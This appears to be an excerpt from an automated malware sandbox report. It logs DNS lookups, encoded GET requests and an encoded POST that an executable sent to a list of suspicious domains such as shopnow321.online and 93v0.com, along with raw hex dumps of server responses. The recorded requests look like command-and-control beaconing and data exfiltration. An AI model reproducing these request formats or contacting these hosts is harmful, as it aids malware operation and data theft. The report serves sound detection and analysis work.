              Source: global trafficHTTP traffic detected: GET /hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM= HTTP/1.1Host: www.93v0.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /mjuo/?tF1tk6=GUK7oVIRF3FAoVitmIo24b7mQO1KNg79CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWshYAEM4vq2qW4/efVo1EPE/sR7lHPgRI0Ri4=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.leadchanges.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zonenail.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: www.fr2e4o.cfd
              Source: global trafficDNS traffic detected: DNS query: www.futuregainers.net
              Source: global trafficDNS traffic detected: DNS query: www.shopnow321.online
              Source: global trafficDNS traffic detected: DNS query: www.klimkina.pro
              Source: global trafficDNS traffic detected: DNS query: www.shahaf3d.com
              Source: global trafficDNS traffic detected: DNS query: www.againbeautywhiteskin.asia
              Source: global trafficDNS traffic detected: DNS query: www.homeppower.com
              Source: global trafficDNS traffic detected: DNS query: www.lenovest.xyz
              Source: global trafficDNS traffic detected: DNS query: www.931951.com
              Source: global trafficDNS traffic detected: DNS query: www.srripaspocon.org
              Source: global trafficDNS traffic detected: DNS query: www.x5hh186z.skin
              Source: global trafficDNS traffic detected: DNS query: www.torentreprenad.com
              Source: global trafficDNS traffic detected: DNS query: www.grecanici.com
              Source: global trafficDNS traffic detected: DNS query: www.ndhockeyprospects.com
              Source: global trafficDNS traffic detected: DNS query: www.navigate-power.boats
              Source: global trafficDNS traffic detected: DNS query: www.qmancha.com
              Source: global trafficDNS traffic detected: DNS query: www.93v0.com
              Source: global trafficDNS traffic detected: DNS query: www.cloud-force.club
              Source: global trafficDNS traffic detected: DNS query: www.leadchanges.info
              Source: global trafficDNS traffic detected: DNS query: www.zonenail.info
              Source: global trafficDNS traffic detected: DNS query: www.okbharat.best
              Source: unknownHTTP traffic detected: POST /41br/ HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 203Origin: http://www.shopnow321.onlineReferer: http://www.shopnow321.online/41br/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoData Raw: 74 46 31 74 6b 36 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 41 65 68 44 73 72 79 72 34 66 47 6b 71 2f 63 72 32 69 6c 56 31 4f 6d 50 36 78 6c 6b 6a 65 67 55 63 48 37 63 54 36 46 4c 77 72 76 52 5a 30 37 79 58 74 63 6c 4b 68 51 74 50 78 59 78 54 42 77 6b 53 61 79 65 49 53 30 7a 51 79 57 43 4a 72 75 36 42 71 78 5a 51 4a 74 4c 58 35 46 50 75 63 50 58 36 76 5a 46 39 54 64 37 58 35 63 64 6e 79 5a 72 53 58 51 34 7a 38 7a 75 66 73 63 47 44 67 38 34 5a 68 43 59 6e 34 35 35 4c 4e 48 65 79 77 6e 4d 76 42 48 31 63 71 57 64 50 36 49 4b 6b 57 43 34 57 2f 71 44 4c 4b 5a 42 5a 6c 71 39 36 77 66 56 44 48 6a 6d 5a 51 3d 3d Data Ascii: tF1tk6=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1cqWdP6IKkWC4W/qDLKZBZlq96wfVDHjmZQ==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:39:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 03 Oct 2022 20:19:07 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:39:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 03 Oct 2022 20:19:07 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:39:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 03 Oct 2022 20:19:07 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:39:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 03 Oct 2022 20:19:07 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Jun 2024 20:39:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID5=fe8e078d9bbe58d91a5515d3e9c8cd8e; expires=Sat, 20-Jul-2024 20:39:17 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:17 GMT; Max-Age=86400; path=/; secure; HttpOnlyServer-version: 05Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 dd 6e db 36 14 be b6 9f e2 54 bb e8 06 94 52 12 a7 45 7e 64 03 6b 9b 6d 1d 3a 6c d8 ba 8b a1 28 06 5a a2 2c c6 14 a9 8a 94 1d 0f bb 58 5b 6c d8 86 01 03 76 bf 8b be 41 3a 34 dd da b5 d9 2b 48 6f b4 43 4a 4e dc c4 69 ba cc 80 2d 91 3c e7 f0 e3 e1 c7 ef d0 61 cc 27 a0 cd 4c b0 be 97 d3 38 e6 72 44 8c ca b7 60 7d 25 df f3 06 dd 6e 18 a0 05 3e bb e1 a5 9b 9f de b8 f3 d5 67 3b 90 9a 4c 0c ba a1 7d 80 a0 72 d4 f7 98 44 d3 30 65 34 1e 74 01 3f 61 c6 0c 45 3b 93 13 76 bf e4 93 be 77 43 49 c3 a4 21 77 66 39 f3 20 6a 5a 7d cf b0 3d 13 d8 40 db 10 a5 b4 d0 cc f4 4b 93 90 0d 0f 82 41 b7 13 1a 6e 04 1b 7c c8 cc 0d 55 e2 20 10 d8 29 0a 55 c0 4d 96 d0 52 98 30 68 0c d0 d2 4d 28 69 86 cb 98 70 36 cd 55 61 16 a6 99 f2 d8 a4 fd 98 4d 78 c4 88 6b 5c 01 2e b9 e1 54 10 1d 51 5c fc aa bf 62 57 db 09 2f 11 02 b7 15 b5 89 80 eb 4a 19 6d 0a 9a 03 21 16 8e e0 72 0c 69 c1 92 be 17 e4 e5 50 f0 28 48 04 35 a4 e4 c1 70 6e 1a 44 5a 1f b7 7c 6c 79 50 30 d1 f7 5c 92 75 ca 98 39 3d d1 07 18 05 be bc 75 fe 34 36 78 3b e5 59 a1 df 08 d3 fa e7 85 da e3 19 b5 fe 27 57 b1 30 4c 34 4d d8 59 73 2c cf 45 9c c5 6e f5 54 62 78 c3 95 d4 67 f9 2f c5 38 77 e7 c8 0e 92 20 43 ce f2 6e 77 e9 a3 3b 9f dc be 0a 3a e5 d9 15 48 90 14 b7 76 ae 91 0d d0 65 6e 37 1f 54 02 8d 01 13 2c 43 e6 69 1f de 17 02 94 49 59 01 1f 7f 01 98 70 7c 05 26 63 6b 9a 70 c1 fc 36 fd c8 80 bb 3c 01 61 30 22 6c de b3 1b af a3 82 e7 06 74 11 9d de f9 5d ed 08 7c 15 81 4c fc 5d ed 0d c2 a0 31 7f 0b c7 82 e9 5c c9 d8 cf b8 3c e5 7a e9 2e 62 e3 c9 3d 4b bd 79 be 4f 12 09 0c 1e a7 f6 14 e1 de 79 27 c8 69 b7 d3 b2 a5 e4 5f 0b 3a 53 65 93 d1 b7 c0 b5 7b bf 64 c5 8c ac fa 1b 7e 6f 09 38 14 85 e6 ac 87 43 15 cf ac 38 a0 3c 58 21 89 04 d5 da 0a c9 88 91 8c 72 49 ec 78 43 f7 85 61 7b fa 71 90 15 38 d2 e9 2c 3a 5a 39 20 Data Ascii: 54eWn6TRE~dkm:l(Z,X[lvA:4+HoCJNi-<a'L8rD`}%n>g;L}rD0e4t?aE;vwCI!wf9 jZ}=@KAn|U )UMR0hM(ip6UaMxk\.TQ\bW/Jm!riP(H5pnDZ|lyP0\u9=u46x;Y'W0L4MYs,EnTbxg/8w Cnw;:Hven7T,CiIYp|&ckp6<a0"lt]|L]1\<z.b=KyOy'i
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Jun 2024 20:39:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID5=ba32b58021643d0af7ea5f5cbc056f48; expires=Sat, 20-Jul-2024 20:39:20 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:20 GMT; Max-Age=86400; path=/; secure; HttpOnlyServer-version: 11Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 dd 6e db 36 14 be b6 9f e2 54 bb e8 06 94 52 12 a7 45 7e 64 03 6b 9b 6d 1d 3a 6c d8 ba 8b a1 28 06 5a a2 2c c6 14 a9 8a 94 1d 0f bb 58 5b 6c d8 86 01 03 76 bf 8b be 41 3a 34 dd 